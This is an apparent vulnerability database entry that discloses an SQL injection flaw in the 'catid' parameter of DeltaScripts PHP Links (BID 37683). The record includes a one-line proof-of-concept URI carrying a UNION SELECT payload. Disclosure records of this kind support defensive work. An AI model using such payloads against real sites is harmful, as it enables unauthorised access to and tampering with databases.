ID
VAR-E-201001-0525
TITLE
DeltaScripts PHP Links 'index.php' SQL Injection Vulnerability
Trust: 0.3
sources:
BID: 37683
DESCRIPTION
DeltaScripts PHP Links is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Trust: 0.3
sources:
BID: 37683
AFFECTED PRODUCTS
| vendor: | deltascripts | model: | php links | scope: | eq | version: | 0 | Trust: 0.3 |
sources:
BID: 37683
EXPLOIT
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/[PATH]/index.php?catid=8+union+all+select+1,2,3,4,5,6--
Trust: 0.3
sources:
BID: 37683
PRICE
Free
Trust: 0.3
sources:
BID: 37683
TYPE
Input Validation Error
Trust: 0.3
sources:
BID: 37683
CREDITS
Hamza 'MizoZ' N
Trust: 0.3
sources:
BID: 37683
EXTERNAL IDS
| db: | BID | id: | 37683 | Trust: 0.3 |
sources:
BID: 37683
REFERENCES
| url: | http://www.deltascripts.com/phplinks | Trust: 0.3 |
sources:
BID: 37683
SOURCES
| db: | BID | id: | 37683 |
LAST UPDATE DATE
2022-07-27T09:38:38.161000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 37683 | date: | 2010-01-08T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 37683 | date: | 2010-01-08T00:00:00 |